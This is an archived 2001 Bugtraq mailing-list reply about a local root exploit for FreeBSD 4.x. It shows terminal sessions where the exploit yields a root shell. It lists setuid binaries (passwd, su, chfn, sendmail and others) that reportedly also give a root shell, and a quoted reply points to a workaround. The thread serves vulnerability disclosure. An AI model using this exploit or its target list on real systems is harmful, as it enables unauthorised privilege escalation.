[21509] in bugtraq
Re: FreeBSD 4.3 local root
daemon@ATHENA.MIT.EDU (Matias Sedalo)
Mon Jul 16 00:29:37 2001
Date: Sun, 15 Jul 2001 07:17:36 -0400 (ART)
From: Matias Sedalo <s0t4ipv6@shellcode.com.ar>
Cc: bugtraq@securityfocus.com
In-Reply-To: <049201c10a05$5dc17bc0$2001a8c0@clitoris>
Message-ID: <Pine.LNX.4.21.0107150717070.2115-100000@mother.xunil.com.ar>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
one@c0d4:/usr/home/c0d4$ uname
FreeBSD one.xxx.com.ar 4.1-RELEASE FreeBSD 4.1-RELEASE
one@c0d4:/usr/home/c0d4$ ./sig2
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe89
child=1371
login: # done
# id
uid=1000(c0d4) euid=0(root) gid=20(staff) groups=20(staff)
#
and with : /usr/bin/chfn ;/usr/bin/chsh
;/usr/bin/ypchpass; /usr/bin/ypchfn; /usr/bin/ypchsh ;/usr/bin/keyinit
; /usr/bin/login ;/usr/bin/passwd
;/usr/libexec/sendmail/sendmail; /usr/local/bin/kcheckpass;/usr/local/bin/icmpinfo
gave me suid shell too.
On Wed, 11 Jul 2001, Przemyslaw Frasunek wrote:
> > Well, after a bunch of tests I've found only two suids which gave me
> > suid shell:
> > /usr/bin/passwd
> > /usr/local/bin/ssh1
>
> /usr/bin/su also works for me:
>
> riget:venglin:~> egrep -e execl vvfreebsd.c
> if(!execl("/usr/bin/su","su","szymon",0))
>
> riget:venglin:~> ./v
> vvfreebsd. Written by Georgi Guninski
> shall jump to bfbffe72
> child=57660
> Password:done
> # id
> uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
>
> > So, quick workaround should be
>
> Quick workaround is to limit arguments, environment and filter non-ascii
> characters:
>
> http://www.frasunek.com/sources/security/rexec/
>
> --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
>
